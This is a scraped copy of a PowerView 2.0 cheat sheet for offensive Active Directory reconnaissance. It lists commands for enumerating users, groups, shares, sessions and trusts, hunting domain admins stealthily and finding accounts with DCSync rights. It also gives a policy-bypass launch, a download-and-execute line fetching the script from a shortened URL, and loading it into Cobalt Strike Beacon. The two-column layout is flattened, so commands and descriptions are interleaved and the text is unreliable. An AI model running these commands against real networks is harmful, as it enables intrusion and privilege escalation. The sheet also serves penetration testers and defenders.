0 valutazioniIl 0% ha trovato utile questo documento (0 voti)
48 visualizzazioni2 pagine
The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.
The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.
The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.
obj.xml Get-NetComputer will enumerate computer objects on a Read .xml object $obj = Import-Clixml given domain through LDAP, returning hostnames by obj.xml default. Return only live hosts -Ping Common Cmdlet Options Display verbose Full computer objects (not -FullData -Verbose status/debug information just hostnames)
Add a 10 second delay Search w/ specific LDAP -Filter Getting Started -Delay 10 between enumerating filter "(description=*web*)" Get PowerView: http://bit.ly/1pzQCnv each machine Search specific domain -ADSpath Load from disk: 1) C:\> powershell –exec bypass 2) PS ADS path (e.g. OUs) "LDAP://OU=secret, ..." C:\> Import-Module powerview.ps1 Execute a “meta” function -Threads 15 with 15 threads Machines with -Unconstrained Load from GitHub: PS C:\> IEX (New-Object unconstrained delegation Net.WebClient).DownloadString(“http://bit.ly/1pzQCnv Pull information from a -Domain foreign.com ”) foreign domain. Otherwise Identifying Your Prey functions default to the Get-NetGroup will enumerate group objects themselves Run on non-domain joined machine: 1) configure DNS to current domain. point to DC of domain, 2) runas /netonly on a given domain through LDAP. /user:DOMAIN\user powershell.exe Reflect LDAP queries -DomainController Return specific name -GroupName *admin* through a specific DC dc.domain.com results Load in Cobalt Strike’s Beacon: beacon> powershell- import /local/path/to/powerview.ps1 , then beacon> Execute a -ComputerName Full group objects -FullData powershell CMDLET-NAME command/search on/for a SERVER.domain.com (Nested) groups a specific -UserName USER specified computer. Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] user is a member of [-full] Many “search” cmdlets (e.g. Invoke-UserHunter) also Get-NetGroupMember will enumerate the members of a have additional common options: Most PowerView functions are implemented in Empire in specific group on a given domain through LDAP. situational_awareness/network/powerview/* Don’t ping machines -NoPing Specified group name -GroupName “Domain before enumerating them Filtering and Output Admins” File of computer names to -ComputerFile file.txt Execute a command on … | %{…Invoke- Full user objects -FullData enumerate each result object Command $_ } Recursively resolve the -Recurse Enumerate computers -ComputerFilter Filter result objects by field … | ? {$_.Field –eq X} members of any results found w/ specific LDAP "(description=*web*)" Only return certain … | Select prop1,prop2 that are groups filter properties Get-NetUser will enumerate user objects on a given Enumerate computers on -ComputerADSpath Display output as a list … | fl domain through LDAP. a specific ADS path (e.g. in "LDAP://OU=secret,..." Display output as wrapped … | ft -wrap specific OUs) Return specific name -UserName “*john*” table results File of user names to -UserFile users.txt Write out to file … | Out-File -Encoding search for Search w/ specific LDAP -Filter "(field=*term*)" Ascii out.txt filter Search for users w/ -UserFilter Write to .csv … | Export-CSV - specific LDAP filter "(description=*web*)" Return users who are (or -AdminCount NoTypeInformation were) a member of an Only search for users on a -UserADSpath out.csv admin protected group specific ADS path "LDAP://OU=secret, ..." Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License. Users with a service -SPN Recursively map all Invoke- Misc. Functions principal name set (likely domain trusts MapDomainTrust Search domain OUs Get-NetOU service accounts) Find users in groups Find-ForeignUser Get all likely fileservers Get-NetFileServer Search specific domain -ADSpath outside of the given Get shares for a specific Get-NetShare ADS path "LDAP://OU=secret, ..." domain (outgoing access) machine X.domain.com Find-UserField will search a specified user field/property Find groups w/ users Find-ForeignGroup Get sessions for a specific Get-NetSession for a given term for all user objects through LDAP. outside of the given –Domain machine X.domain.com Specify the field to search -SearchField description domain (incoming access) target.domain.com Get logged on users for a Get-NetLoggedOn Term to search for -SearchTerm term Enumerate local Invoke- specific machine X.domain.com administrators in groups EnumerateLocalAdmin User-Hunting not in the given domain -TrustGroup Get RDP sessions (and Get-NetRDPSession Invoke-UserHunter will use LDAP queries and API calls to source IPs) X.domain.com locate users on the domain. Note: default behavior Data Mining Get (possibly) exploitable Get-ExploitableSystem searches for “Domain Admins” and touches every Invoke-ShareFinder will use LDAP queries and API calls to systems machine on the domain! search for open shares on the domain. Note: default behavior touches every machine on the domain! Power-One-Liners Hunt for members of a -GroupName “Web Take a GPP GUID and get all computers the local admin specific group Admins” Only return shares the -CheckShareAccess current user can read password is applied to: Get-NetOU -GUID {GPP_GUID} | Show all results (i.e. don’t -ShowAll %{ Get-NetComputer -ADSPath $_ } filter by user targets) Find-InterestingFile will recursively search a given local/UNC path for files matching specific criteria. Find machines the current user has local admin access Hunt using only session -Stealth on: Find-LocalAdminAccess information from file Search a specific UNC path -Path \\SERVER\Share Get the default domain access policy: Get-DomainPolicy servers/DCs Only return files with the -Terms | Select -Expand SystemAccess Hunt for users who are -TargetServer specified search terms in term1,term2,term3 their names. See who can admin all domain controllers in the current effective local admins for a SERVER.domain.com domain: Get-NetDomainController | Get-NetLocalGroup given server Only return office docs -OfficeDocs See what objects have DCSync rights: Get-ObjectACL - Stop on first successful -StopOnSuccess Only return files accessed -LastAccessTime (Get- DistinguishedName "dc=domain,dc=local" - result found within the last week. Date).AddDays(-7) ResolveGUIDs | ? { ($_.ObjectType -match 'replication- Domain [Trusts] Local Admin Enumeration get') -or ($_.ActiveDirectoryRights -match 'GenericAll')} Info on the current domain Get-NetDomain Get-NetLocalGroup will enumerate the local Users with sidHistory set: Get-NetUser -Filter Domain controllers for the Get- users/groups from localhost or a remote machine. '(sidHistory=*)' current domain NetDomainController Enumerate local admins -ComputerName X Users with passwords > 1 year: $Date = (Get- Info on the current forest Get-NetForest from hostname (or IP) Date).AddYears(-1).ToFileTime();Get-NetUser -Filter List the local groups -ListGroups "(pwdlastset<=$Date)" Enumerate all domains in Get-NetForestDomain the current forest instead of group members Search SYSVol for common scripts: Invoke-FileFinder Use an alternate group -GroupName "Remote –SearchSYSVol Get all forest trusts for the Get-NetForestTrust current forest besides local admins Desktop Users" More Information Get all domain trusts (à la Get-NetDomainTrust Resolve and results that -Recurse http://www.harmj0y.net/blog/tag/powerview/ nltest /trusted_domains) are groups, giving a set of http://www.verisgroup.com/adaptive-threat-division/ effective users
Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.